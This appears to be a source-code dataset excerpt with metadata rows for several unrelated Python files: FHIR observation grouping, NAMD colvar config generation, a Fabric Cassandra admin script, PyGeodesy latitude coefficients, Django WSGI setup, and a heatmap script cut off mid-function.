| blob_id (string, 40-40) | directory_id (string, 40-40) | path (string, 2-616) | content_id (string, 40-40) | detected_licenses (list, 0-69) | license_type (string, 2 classes) | repo_name (string, 5-118) | snapshot_id (string, 40-40) | revision_id (string, 40-40) | branch_name (string, 4-63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k-686M, nullable) | star_events_count (int64, 0-209k) | fork_events_count (int64, 0-110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (string, 213 classes) | src_encoding (string, 30 classes) | language (string, 1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2-10.3M) | extension (string, 246 classes) | content (string, 2-10.3M) | authors (list, 1-1) | author_id (string, 0-212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
308191439bd0dc074805fd6cd7cb7ede780d59da
|
2a67feee9e9b2bbb42c22db1c238641035865f31
|
/fhir_patient_summary/createObservationDictionary.py
|
963c21e034cb567815ed76839c5e46e804977ea0
|
[
"MIT"
] |
permissive
|
nicford/FHIR-Patient-Summary
|
7635e8895fc53d4b2ba0e90c1d300d602a9c08aa
|
facda81a739d0981cdd8cc5637c7bd43b632f4bb
|
refs/heads/master
| 2021-04-08T16:15:38.159803
| 2020-03-20T21:27:39
| 2020-03-20T21:27:39
| 248,789,057
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,361
|
py
|
from fhir_parser import FHIR, observation


class observationDetails:
    def __init__(self, component, date):
        self.component = component
        self.date = date


def getObservationDate(observationDetails: observationDetails):
    return observationDetails.date


def createObservationDictionary(observations):
    observationDictionary = {}
    for observation in observations:
        observationDate = observation.effective_datetime
        for component in observation.components:
            componentCode = component.code
            # Skip blood-pressure panel readings ("85354-9"): the panel itself carries
            # no useful value because blood pressure is split into separate systolic
            # and diastolic component readings. Tobacco status readings ("72166-2")
            # are likewise skipped as uninformative here.
            if componentCode == "85354-9" or componentCode == "72166-2":
                continue
            if componentCode == "72514-3":
                component.unit = ""
            if component.code not in observationDictionary:
                observationDictionary[component.code] = []
            observationDictionary[component.code].append(observationDetails(component, observationDate))
    # sort each component's list chronologically
    for key in observationDictionary:
        currentList = observationDictionary[key]
        currentList.sort(key=getObservationDate)
    return observationDictionary
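
# Shape of the result, for intuition (illustrative only; the LOINC code and
# values are made up, not taken from this repository):
# {"8302-2": [observationDetails(<body-height component>, <effective datetime>), ...],
#  ...} with each per-code list sorted by observation date.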
|
[
"univnf@gmail.com"
] |
univnf@gmail.com
|
21eb60d5344f9299bf8910604589c761cd554762
|
765e850116564d47d7ac3afa38ac2c56ccd1ce29
|
/ScMiles/colvar.py
|
d59d7f76fc9195c65c32c9fbca1a00fb2072fb25
|
[] |
no_license
|
UTmilestoning/ScMiles2.0
|
87c7ff9f874aa81392e551c885872be1d1818c48
|
edd23d864834a0e773207b80367a1b68f31cc2c0
|
refs/heads/master
| 2023-06-14T11:41:52.204370
| 2020-09-21T15:45:27
| 2020-09-21T15:45:27
| 315,404,147
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,068
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 30 09:58:01 2020

@author: allis
"""

'''
This code generates the colvar configuration file required by NAMD.
Two constraints will be considered:
1. RMSD(x, anchor_a) = RMSD(x, anchor_b).
2. RMSD(x, any_anchor_besides_a_or_b) > RMSD(x, anchor_a) &&
   RMSD(x, any_anchor_besides_a_or_b) > RMSD(x, anchor_b).

Note:
RMSD(x, anchor_a): the root mean square displacement from anchor_a to x
'''
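
# Illustrative sketch of the kind of Colvars input this class emits for two
# colvars named "psi" and "phi" (the names and anchor values a1/a2/b1/b2 are
# made up; the real text depends on colvar.txt and anchors.txt):
#
#   colvar {
#     name neighbor
#     customFunction sqrt((psi-(a1))^2 + (phi-(a2))^2) - sqrt((psi-(b1))^2 + (phi-(b2))^2)
#     ... collective variable definitions copied from colvar.txt ...
#   }
#   harmonic {
#     colvars neighbor
#     centers 0
#     forceConstant <forceConst>
#   }
#
# plus harmonicWalls with lowerWalls 0 on the analogous "i_a"/"i_b" colvars for
# every other anchor i, which together enforce constraints 1 and 2 above.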
class colvar:
    def __init__(self, parameter, anchor1=None, anchor2=None,
                 free=None, initial=None,
                 config_path=None, variables=None):
        self.parameter = parameter
        self.anchor1 = anchor1
        self.anchor2 = anchor2
        self.variables = []
        self.free = free
        self.colvars_number = len(self.parameter.anchors[0])
        for i in range(1, self.colvars_number + 1):
            self.variables.append("")
        self.initial = initial
        self.config_path = self.parameter.ScMilesPath + "/colvar_free.conf" if self.free == 'yes' else self.parameter.ScMilesPath + "/colvar.conf"

    def __exit__(self, exc_type, exc_value, traceback):
        return

    def __repr__(self) -> str:
        return ('Colvar generator')

    # def __collective_vari_1(self, name=None, coeff=None, space=0):
    #     '''
    #     Change this function for a different 1D case.
    #     Follow the format in Colvars to define a collective variable.
    #     For the commands below, it generates the following.
    #
    #     dihedral {
    #         name psi
    #         group1 atomNumbers 7
    #         group2 atomNumbers 9
    #         group3 atomNumbers 15
    #         group4 atomNumbers 17
    #     }
    #
    #     '''
    #     fconf = open(self.config_path, 'a')
    #     print(" " * space + " dihedral {", file=fconf)
    #     if name:
    #         print(" " * space + " name {}".format(name), file=fconf)
    #     if coeff:
    #         print(" " * space + " componentCoeff {}".format(coeff), file=fconf)
    #     print(" " * space + " group1 atomNumbers 7", file=fconf)
    #     print(" " * space + " group2 atomNumbers 9", file=fconf)
    #     print(" " * space + " group3 atomNumbers 15", file=fconf)
    #     print(" " * space + " group4 atomNumbers 17", file=fconf)
    #     print(" " * space + " }", file=fconf)
    #     fconf.close()

    def __get_colvar_names(self):
        '''Stores colvar names in array "variables"'''
        count = 0
        section = 1
        with open(file=self.parameter.inputPath + '/colvar.txt') as f:
            for line in f:
                if '{' in line:
                    count += 1
                if '}' in line:
                    count -= 1
                    if count == 0:
                        section += 1
                if "name" in line:
                    info = line.split("#")[0].split()
                    if len(info) >= 2 and info[0] == "name":
                        self.variables[section-1] = str(info[1])
                if self.colvars_number == section:
                    break

    def __collective_vari(self, name=None, coeff=None, space=0):
        '''Saves all text from colvar.txt for each name (so not rmsd)'''
        tmp = []
        count = 0
        section = 1
        with open(file=self.parameter.inputPath+'/colvar.txt') as f:
            for line in f:
                if '{' in line:
                    count += 1
                if '}' in line:
                    count -= 1
                    if count == 0:
                        section += 1
                        if section > self.colvars_number:
                            tmp.append(line + '\n')
                            break
                tmp.append(line + '\n')
        fconf = open(self.config_path, 'a')
        for line in tmp:
            print(" " * space + " " + line, file=fconf)
        fconf.close()
        for i in range(1, self.colvars_number + 1):
            if self.variables[i-1] == '':
                # log() is ScMiles' logging helper; it is not imported in this file as given
                log("Colvar Error. Please name your colvars")

    def __rmsd_to_anchor(self, anchor, coeff=None, space=0):
        '''Used in the "free" case; replaces "anchor" with the corresponding number in anchors.txt'''
        # scriptPath = os.path.dirname(os.path.abspath(__file__))
        # inputdir = os.path.abspath(os.path.join(scriptPath, os.pardir)) + '/my_project_input'
        tmp = []
        count = 0
        first = True
        section = 1
        name_get = False
        with open(file=self.parameter.inputPath+'/colvar.txt') as f:
            for line in f:
                if '{' in line:
                    first = False
                    count += 1
                if '}' in line:
                    count -= 1
                    if count == 0 and first == False:
                        if section == self.colvars_number + 1:
                            tmp.append(line + '\n')
                        section += 1
                        continue
                if section == self.colvars_number + 1:
                    if 'name' in line and name_get == False:
                        line = " name rmsd" + str(anchor)
                        name_get = True
                    # if 'anchor' in line:
                    #     line = line.replace("anchor", '('+str(self.parameter.anchors[anchor-1][0])+')')
                    if 'anchor' in line:
                        for i in range(0, self.colvars_number):
                            line = line.replace("anchor", '('+str(self.parameter.anchors[anchor-1][i])+')', 1)
                    tmp.append(line + '\n')
        fconf = open(self.config_path, 'a')
        for line in tmp:
            print(" " * space + " " + line, file=fconf)
        fconf.close()

    # def __rmsd_to_anchor(self, anchor, coeff=None, space=0):
    #     '''
    #     Change this function for a different 1D case.
    #     Follow the format in Colvars to define the distance measurement.
    #     For the commands below, it generates the following.
    #
    #     colvar {
    #         name rmsd1
    #         customFunction abs(psi - (-165.0))
    #         dihedral {
    #             name psi
    #             group1 atomNumbers 7
    #             group2 atomNumbers 9
    #             group3 atomNumbers 15
    #             group4 atomNumbers 17
    #         }
    #     }
    #
    #     '''
    #     fconf = open(self.config_path, 'a')
    #     name = "rmsd" + str(anchor)
    #     print("\n" + " " * space + "colvar {", file=fconf)
    #     print(" " * space + " name {:5}".format(name), file=fconf)
    #     func = "abs(psi - (" + str(self.parameter.anchors[anchor-1][0]) + "))"
    #     print(" " * space + " customFunction {}".format(func), file=fconf)
    #     fconf.close()
    #     self.__collective_vari_1()
    #     fconf = open(self.config_path, 'a')
    #     print(" " * space + "}", file=fconf)
    #     fconf.close()

    def generate(self):
        '''This is the main function that generates colvars.'''
        # scriptPath = os.path.dirname(os.path.abspath(__file__))
        if self.initial == 'yes':
            outputFrequency = 1
        else:
            outputFrequency = self.parameter.colvarsTrajFrequency
        fconf = open(self.config_path, 'w+')
        print("colvarsTrajFrequency {}".format(outputFrequency), file=fconf)
        print("colvarsRestartFrequency {}".format(self.parameter.colvarsRestartFrequency), file=fconf)
        if self.free == 'yes':
            print("scriptedColvarForces on", file=fconf)
        if self.parameter.customColvars == True:
            print("", file=fconf)
            with open(file=self.parameter.inputPath + '/custom.colvar') as f_custom:
                for line in f_custom:
                    print(line, file=fconf)
        fconf.close()
        if self.free == 'yes':
            for i in range(self.parameter.AnchorNum):
                self.__rmsd_to_anchor(i+1)
        else:
            self.__get_colvar_names()
            if self.colvars_number == 1:
                self.__constraint1D1()
                self.__harmonic1D()
            else:
                self.__constraint2D1()
                colvarList, centers = self.__constraint2D2()
                self.__harmonic2D()
                self.__harmonicWalls(colvarList, centers)

    def __constraint1D1(self):
        fconf = open(self.config_path, 'a')
        print("\ncolvar {", file=fconf)
        print(" name colv", file=fconf)
        fconf.close()
        self.__collective_vari()
        fconf = open(self.config_path, 'a')
        print("}\n\n", file=fconf)
        fconf.close()

    def __harmonic1D(self):
        fconf = open(self.config_path, 'a')
        print("\nharmonic {", file=fconf)
        print(" colvars colv", file=fconf)
        center = (self.parameter.anchors[self.anchor1-1][0] + self.parameter.anchors[self.anchor2-1][0]) / 2
        if self.parameter.pbc != [] and abs(self.anchor1 - self.anchor2) > 1:
            center = 180
        print(" centers {}".format(center), file=fconf)
        print(" forceConstant {}".format(self.parameter.forceConst), file=fconf)
        print("}", file=fconf)
        fconf.close()

    def __constraint2D1(self):
        fconf = open(self.config_path, 'a')
        print("\ncolvar {", file=fconf)
        print(" name neighbor", file=fconf)
        customFunc = self.__custom_function(self.anchor1-1, self.anchor2-1)
        print(customFunc, file=fconf)
        fconf.close()
        self.__collective_vari(space=1)
        fconf = open(self.config_path, 'a')
        print("}\n\n", file=fconf)
        fconf.close()

    def __custom_function(self, anchor1, anchor2):
        '''Creates the customFunction for cases with more than one colvar'''
        customFunc = " customFunction "
        for section in (1, 2):
            if section == 1:
                anchor = anchor1
            else:
                anchor = anchor2
            customFunc = customFunc + 'sqrt('
            for i in range(1, self.colvars_number + 1):
                customFunc = customFunc + '(' + self.variables[i-1] + '-(' + \
                    str(self.parameter.anchors[anchor][i-1]) + '))^2'
                if i != self.colvars_number:
                    customFunc = customFunc + ' + '
            if section == 1:
                customFunc = customFunc + ') - '
            else:
                customFunc = customFunc + ')'
        return customFunc

    def __constraint2D2(self):
        colvarList = ""
        centers = ""
        for i in range(self.parameter.AnchorNum):
            if i + 1 != self.anchor1 and i + 1 != self.anchor2:
                fconf = open(self.config_path, 'a')
                print("colvar {", file=fconf)
                print(" name {}_{}".format(i + 1, self.anchor1), file=fconf)
                customFunc = self.__custom_function(i, self.anchor1-1)
                print(customFunc, file=fconf)
                colvarList += str(i + 1) + "_" + str(self.anchor1) + " "
                centers += "0 "
                fconf.close()
                self.__collective_vari(space=2)
                fconf = open(self.config_path, 'a')
                print("}\n", file=fconf)
                print("colvar {", file=fconf)
                print(" name {}_{}".format(i + 1, self.anchor2), file=fconf)
                customFunc = self.__custom_function(i, self.anchor2-1)
                print(customFunc, file=fconf)
                colvarList += str(i + 1) + "_" + str(self.anchor2) + " "
                centers += "0 "
                fconf.close()
                self.__collective_vari(space=2)
                fconf = open(self.config_path, 'a')
                print("}\n", file=fconf)
                fconf.close()
        return colvarList, centers

    def __harmonic2D(self):
        fconf = open(self.config_path, 'a')
        print("harmonic {", file=fconf)
        print(" colvars neighbor", file=fconf)
        center = 0
        print(" centers {}".format(str(center)), file=fconf)
        print(" forceConstant {}".format(self.parameter.forceConst), file=fconf)
        print("}", file=fconf)
        fconf.close()

    def __harmonicWalls(self, colvarList, centers):
        fconf = open(self.config_path, 'a')
        print("\n", file=fconf)
        print("harmonicWalls {", file=fconf)
        print(" colvars {}".format(colvarList), file=fconf)
        print(" lowerWalls {}".format(centers), file=fconf)
        print(" lowerWallConstant {}".format(self.parameter.forceConst), file=fconf)
        print("}", file=fconf)
        fconf.close()


if __name__ == '__main__':
    from parameters import *
    new = parameters()
    new.initialize()
    print(new.anchors)
    colvar(new, anchor1=1, anchor2=2).generate()
    colvar(new, anchor1=1, anchor2=2, free='yes').generate()
|
[
"noreply@github.com"
] |
UTmilestoning.noreply@github.com
|
f252de4cff61581fdaf7d56a81128d97eeb01fb5
|
8ca2516c71e5e23b393c9b635f09b8c379468844
|
/Terraform/cassandra/scripts/cas.py
|
e83a081190f06b027ad7507805506e6189c6432b
|
[] |
no_license
|
richnusgeeks/devops
|
de8823f493e48f2216406b067474d67c851d46e4
|
e0abaf170ba66ce83542140bfc243b4a509ceafd
|
refs/heads/master
| 2023-02-27T19:33:59.261885
| 2023-02-09T11:43:39
| 2023-02-09T11:43:39
| 27,112,863
| 11
| 12
| null | 2022-09-30T20:23:06
| 2014-11-25T06:45:47
|
Shell
|
UTF-8
|
Python
| false
| false
| 778
|
py
|
from time import sleep

from fabric.api import env, sudo, run, get, put, local
from fabric.decorators import hosts, roles, parallel

env.user = "ubuntu"
env.key_filename = "<Private Key>"
env.warn_only = True
env.skip_bad_hosts = True
env.connection_attempts = 3
env.abort_on_prompts = True


def postCAS(dump=False):
    if not dump:
        sudo("service dse start")
        # run("while true; do if ! nc -vz ${self.private_ip} 9042 9160 2>/dev/null; then sleep 5; else break; fi; done")
        run("sleep 20")
    run("nodetool status; nodetool info; nodetool tpstats; echo")
    sudo("netstat -nlptu | grep -E '(9042|9160)'")


def rmveCASNds():
    run("for u in $(nodetool status|grep DN|awk '{print $7}'); do nodetool removenode $u; nodetool removenode force; done")
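
# Note on rmveCASNds(): `nodetool removenode <host-id>` starts removal of each
# down ("DN") node, and the bare `nodetool removenode force` that follows
# forces completion of the removal currently in progress.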
|
[
"ankur.kumar@reltio.com"
] |
ankur.kumar@reltio.com
|
00131fab13b704870de4a2453e7aa99e38d101fc
|
e3cfab409afb5ff9a0b3812bf848be6ca9239cee
|
/pygeodesy/auxilats/_CX_4.py
|
8f0be523af660c0f819c189cb7568d29290f9271
|
[
"MIT"
] |
permissive
|
mrJean1/PyGeodesy
|
565266a4f7f6cda5abe98e915bbd868f6cbe1760
|
eba35704b248a7a0388b30f3cea19793921e99b7
|
refs/heads/master
| 2023-08-23T13:58:20.069917
| 2023-08-20T18:50:45
| 2023-08-20T18:50:45
| 68,028,481
| 283
| 66
| null | 2022-04-09T00:40:52
| 2016-09-12T16:49:10
|
Python
|
UTF-8
|
Python
| false
| false
| 8,662
|
py
|
# -*- coding: utf-8 -*-
u'''Coefficients for C{_AUXLATITUDE_ORDER} 4 from I{Karney}'s C++ class U{AuxLatitude
<https://GeographicLib.SourceForge.io/C++/doc/classGeographicLib_1_1AuxLatitude.html>}
transcoded to a double, uniquified Python C{dict[auxout][auxin]}.

Copyright (C) Charles Karney (2022-2023) <Karney@Alum.MIT.edu> and licensed under the
MIT/X11 License.  For more information, see <https://GeographicLib.SourceForge.io>.
'''
# make sure int/int division yields float quotient
from __future__ import division as _; del _ # PYCHOK semicolon
from pygeodesy.auxilats.auxily import Aux, _Ufloats
from pygeodesy.constants import _0_0, _0_25, _0_5, _1_0, _N_1_0, \
_1_5, _2_0, _N_2_0, _4_0
__all__ = ()
__version__ = '23.08.19'
_f, _u = float, _Ufloats()
_coeffs_4 = _u._Coeffs(4, { # GEOGRAPHICLIB_AUXLATITUDE_ORDER == 4
Aux.PHI: {
# C[phi,phi] skipped
Aux.BETA: _u( # C[phi,beta]; even coeffs only
_0_0, _1_0,
_0_0, _0_5,
1 / _f(3),
_0_25,),
Aux.THETA: _u( # C[phi,theta]; even coeffs only
_N_2_0, _2_0,
-_4_0, _2_0,
8 / _f(3),
_4_0,),
Aux.MU: _u( # C[phi,mu]; even coeffs only
-27 / _f(32), _1_5,
-55 / _f(32), 21 / _f(16),
151 / _f(96),
1097 / _f(512),),
Aux.CHI: _u( # C[phi,chi]
116 / _f(45), _N_2_0, -2 / _f(3), _2_0,
-227 / _f(45), -8 / _f(5), 7 / _f(3),
-136 / _f(35), 56 / _f(15),
4279 / _f(630),),
Aux.XI: _u( # C[phi,xi]
-2582 / _f(14175), -16 / _f(35), 4 / _f(45), 4 / _f(3),
-11966 / _f(14175), 152 / _f(945), 46 / _f(45),
3802 / _f(14175), 3044 / _f(2835),
6059 / _f(4725),)
},
Aux.BETA: {
Aux.PHI: _u( # C[beta,phi]; even coeffs only
_0_0, _N_1_0,
_0_0, _0_5,
-1 / _f(3),
_0_25,),
# C[beta,beta] skipped
Aux.THETA: _u( # C[beta,theta]; even coeffs only
_0_0, _1_0,
_0_0, _0_5,
1 / _f(3),
_0_25,),
Aux.MU: _u( # C[beta,mu]; even coeffs only
-9 / _f(32), _0_5,
-37 / _f(96), 5 / _f(16),
29 / _f(96),
539 / _f(1536),),
Aux.CHI: _u( # C[beta,chi]
38 / _f(45), -1 / _f(3), -2 / _f(3), _1_0,
-7 / _f(9), -14 / _f(15), 5 / _f(6),
-34 / _f(21), 16 / _f(15),
2069 / _f(1260),),
Aux.XI: _u( # C[beta,xi]
-1082 / _f(14175), -46 / _f(315), 4 / _f(45), 1 / _f(3),
-338 / _f(2025), 68 / _f(945), 17 / _f(90),
1102 / _f(14175), 461 / _f(2835),
3161 / _f(18900),)
},
Aux.THETA: {
Aux.PHI: _u( # C[theta,phi]; even coeffs only
_2_0, _N_2_0,
-_4_0, _2_0,
-8 / _f(3),
_4_0,),
Aux.BETA: _u( # C[theta,beta]; even coeffs only
_0_0, _N_1_0,
_0_0, _0_5,
-1 / _f(3),
_0_25,),
# C[theta,theta] skipped
Aux.MU: _u( # C[theta,mu]; even coeffs only
-23 / _f(32), -1 / _f(2),
-5 / _f(96), 5 / _f(16),
1 / _f(32),
283 / _f(1536),),
Aux.CHI: _u( # C[theta,chi]
4 / _f(9), -2 / _f(3), -2 / _f(3), _0_0,
-23 / _f(45), -4 / _f(15), 1 / _f(3),
-24 / _f(35), 2 / _f(5),
83 / _f(126),),
Aux.XI: _u( # C[theta,xi]
-2102 / _f(14175), -158 / _f(315), 4 / _f(45), -2 / _f(3),
934 / _f(14175), -16 / _f(945), 16 / _f(45),
922 / _f(14175), -232 / _f(2835),
719 / _f(4725),)
},
Aux.MU: {
Aux.PHI: _u( # C[mu,phi]; even coeffs only
9 / _f(16), -3 / _f(2),
-15 / _f(32), 15 / _f(16),
-35 / _f(48),
315 / _f(512),),
Aux.BETA: _u( # C[mu,beta]; even coeffs only
3 / _f(16), -1 / _f(2),
1 / _f(32), -1 / _f(16),
-1 / _f(48),
-5 / _f(512),),
Aux.THETA: _u( # C[mu,theta]; even coeffs only
13 / _f(16), _0_5,
33 / _f(32), -1 / _f(16),
-5 / _f(16),
-261 / _f(512),),
# C[mu,mu] skipped
Aux.CHI: _u( # C[mu,chi]
41 / _f(180), 5 / _f(16), -2 / _f(3), _0_5,
557 / _f(1440), -3 / _f(5), 13 / _f(48),
-103 / _f(140), 61 / _f(240),
49561 / _f(161280),),
Aux.XI: _u( # C[mu,xi]
-1609 / _f(28350), 121 / _f(1680), 4 / _f(45), -1 / _f(6),
16463 / _f(453600), 26 / _f(945), -29 / _f(720),
449 / _f(28350), -1003 / _f(45360),
-40457 / _f(2419200),)
},
Aux.CHI: {
Aux.PHI: _u( # C[chi,phi]
-82 / _f(45), 4 / _f(3), 2 / _f(3), _N_2_0,
-13 / _f(9), -16 / _f(15), 5 / _f(3),
34 / _f(21), -26 / _f(15),
1237 / _f(630),),
Aux.BETA: _u( # C[chi,beta]
-16 / _f(45), _0_0, 2 / _f(3), _N_1_0,
19 / _f(45), -2 / _f(5), 1 / _f(6),
16 / _f(105), -1 / _f(15),
17 / _f(1260),),
Aux.THETA: _u( # C[chi,theta]
-2 / _f(9), 2 / _f(3), 2 / _f(3), _0_0,
43 / _f(45), 4 / _f(15), -1 / _f(3),
2 / _f(105), -2 / _f(5),
-55 / _f(126),),
Aux.MU: _u( # C[chi,mu]
1 / _f(360), -37 / _f(96), 2 / _f(3), -1 / _f(2),
437 / _f(1440), -1 / _f(15), -1 / _f(48),
37 / _f(840), -17 / _f(480),
-4397 / _f(161280),),
# C[chi,chi] skipped
Aux.XI: _u( # C[chi,xi]
-2312 / _f(14175), -88 / _f(315), 34 / _f(45), -2 / _f(3),
6079 / _f(14175), -184 / _f(945), 1 / _f(45),
772 / _f(14175), -106 / _f(2835),
-167 / _f(9450),)
},
Aux.XI: {
Aux.PHI: _u( # C[xi,phi]
538 / _f(4725), 88 / _f(315), -4 / _f(45), -4 / _f(3),
-2482 / _f(14175), 8 / _f(105), 34 / _f(45),
-898 / _f(14175), -1532 / _f(2835),
6007 / _f(14175),),
Aux.BETA: _u( # C[xi,beta]
34 / _f(675), 32 / _f(315), -4 / _f(45), -1 / _f(3),
74 / _f(2025), -4 / _f(315), -7 / _f(90),
2 / _f(14175), -83 / _f(2835),
-797 / _f(56700),),
Aux.THETA: _u( # C[xi,theta]
778 / _f(4725), 62 / _f(105), -4 / _f(45), 2 / _f(3),
12338 / _f(14175), -32 / _f(315), 4 / _f(45),
-1618 / _f(14175), -524 / _f(2835),
-5933 / _f(14175),),
Aux.MU: _u( # C[xi,mu]
1297 / _f(18900), -817 / _f(10080), -4 / _f(45), 1 / _f(6),
-29609 / _f(453600), -2 / _f(35), 49 / _f(720),
-2917 / _f(56700), 4463 / _f(90720),
331799 / _f(7257600),),
Aux.CHI: _u( # C[xi,chi]
2458 / _f(4725), 46 / _f(315), -34 / _f(45), 2 / _f(3),
3413 / _f(14175), -256 / _f(315), 19 / _f(45),
-15958 / _f(14175), 248 / _f(567),
16049 / _f(28350),) # PYCHOK exported
# C[xi,xi] skipped
}
})
# _ptrs_4 = (0, 0, 6, 12, 18, 28, 38, 44, 44, 50, 56, 66,
# 76, 82, 88, 88, 94, 104, 114, 120, 126, 132, 132, 142,
# 152, 162, 172, 182, 192, 192, 202, 212, 222, 232, 242, 252,
# 252) # PYCHOK exported
del _f, _u
# **) MIT License
#
# Copyright (C) 2023-2023 -- mrJean1 at Gmail -- All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
|
[
"mrJean1@Gmail.com"
] |
mrJean1@Gmail.com
|
ca72dad07785635db839762f87edc38573cf4b74
|
011db9359d76d875acf1e56334b1cbe4439b80c0
|
/restTest/wsgi.py
|
acdb195242da74ac01dfc94667bd37805e5a0c5f
|
[] |
no_license
|
buckyron/djangorest
|
3aed87319ee6a808724fdd8259c93463edb7ea3b
|
ce61b23ffc83a8fddfbdbfca1e41ccbac17198d3
|
refs/heads/master
| 2022-12-29T22:49:22.395069
| 2020-10-19T06:51:01
| 2020-10-19T06:51:01
| 305,288,768
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
WSGI config for restTest project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'restTest.settings')
application = get_wsgi_application()
|
[
"harivicky2020@gmail.com"
] |
harivicky2020@gmail.com
|
8114b030b00d54522fb2caa1fbfcae53b2daf2fe
|
1fdc5597e06055662aa31ba425d5d7449721efe8
|
/Alphabet_2/CODE/sub_alphabet.py
|
8e0c314cedd91965ff67394efc6bb10857866c78
|
[] |
no_license
|
VibhutiNandel/GitHub_test
|
2ebb0c3b9bdf3c5509744c294c306e4cb63cd380
|
f184e7e925c7f485c6e1f4530310f1cd2900ba74
|
refs/heads/master
| 2020-04-17T05:54:35.634357
| 2019-01-17T22:03:30
| 2019-01-17T22:03:30
| 166,238,552
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
#! /usr/bin/env python

# Append letters to the results file, one per line. Note that range(65, 90)
# stops at ASCII 89 ('Y'); the end would need to be 91 to include 'Z'.
for x in range(65, 90):
    with open("RESULTS/initial_test.txt", "ab") as Infile:
        Infile.write(chr(x) + "\n")
|
[
"v.nandel@student.rug.nl"
] |
v.nandel@student.rug.nl
|
da50f84db280709c8bf00d786a3c4d94770be37c
|
15018a1c9784c9abaabea2e65d802d4a339b74e5
|
/hairpin/admin.py
|
8eaf8a6d318654126ecf2ef7f973427b9b7d38ef
|
[
"MIT"
] |
permissive
|
Gaidy/lin_hairpin
|
b9edaa0d547f1981489ffd8e73384df1c13a3828
|
1267e880d4b88d841019a904009bbf5828c1db09
|
refs/heads/master
| 2022-10-02T20:08:38.571702
| 2020-03-13T04:12:49
| 2020-03-13T04:12:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,033
|
py
|
from django.contrib import admin

from hairpin.models import Category, Product, Cami, Order, PayRecord, CAMI_TYPE_MAP


@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
    """
    Category management
    """
    list_display = ['id', 'title', 'desc']


@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
    """
    Product management
    """
    list_display = ['id', 'category_name', 'title', 'cami_type_name', 'price', 'desc', 'status']

    def category_name(self, obj):
        return obj.category.title

    def cami_type_name(self, obj):
        return CAMI_TYPE_MAP[obj.cami_type]

    cami_type_name.short_description = '卡密类型'  # "card-key type"
    category_name.short_description = '产品分类'  # "product category"


@admin.register(Cami)
class CamiAdmin(admin.ModelAdmin):
    """
    Card-key management
    """
    pass


@admin.register(PayRecord)
class PayRecordAdmin(admin.ModelAdmin):
    """
    Payment record management
    """
    pass


@admin.register(Order)
class OrderAdmin(admin.ModelAdmin):
    """
    Order management
    """
    pass
|
[
"406728295@qq.com"
] |
406728295@qq.com
|
d381bf0d3308017cf95d705aab828040beeeab2d
|
aebe19a393e9dcba5c4799cf73cd2912a40abc9e
|
/setup.py
|
64b0059e88dc09a2cadfcadedafbffb2b602da13
|
[] |
no_license
|
jdque/raycast
|
0aed0c996422da31eea2a892723b278175ac6ef2
|
e22a5c6d342cafa0219e98d04cee74e38403260f
|
refs/heads/master
| 2021-01-12T15:15:50.421437
| 2017-02-21T02:17:05
| 2017-02-21T02:17:05
| 71,736,614
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 338
|
py
|
from setuptools import setup
# from Cython.Build import cythonize
# import numpy
# setup(
# name = "Hello",
# ext_modules = cythonize('geometry_c.pyx'),
# include_dirs=[numpy.get_include()]
# )
setup(
    name = "raycast",
    version = "0.1",
    install_requires = [
        'numpy',
        'pysdl2',
        'pyopengl'
    ]
)
|
[
"jaqms90@gmail.com"
] |
jaqms90@gmail.com
|
a94ce7a44499ba970ed1db8268d174d859b0f802
|
f4448831c8594cc16eb6f5e123a6f6157d7d9f4e
|
/conven_control/scripts/stiffness_heatmap.py
|
6d52294f7ddbbbd7ddfb16a3a28cd8bbe42edea1
|
[] |
no_license
|
benthebear93/null-space-posture-optimization
|
64ed58ffed6ac5be216bdd1f369dde66adda890f
|
9bf6226d301c1b63f18c0ac877c792b8393f6f71
|
refs/heads/main
| 2023-09-05T07:02:03.852252
| 2021-11-24T15:14:26
| 2021-11-24T15:14:26
| 399,497,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,769
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd


def heatmap_read(filename, axisname):
    # load_wb = load_workbook("C:/Users/UNIST/Desktop/stiffness_estimation/test_z.xlsx", data_only=True)
    df = pd.read_excel(filename, header=None, names=None, index_col=None)
    num_test = df.shape[0]
    print(df)
    xtick = [0.65, 0.8, 0.95]
    ytick = [-0.35, -0.2, -0.05, 0.1, 0.25]
    stiffness = []
    overall_stiff = []
    opt_stiffness = []
    overall_optstiff = []
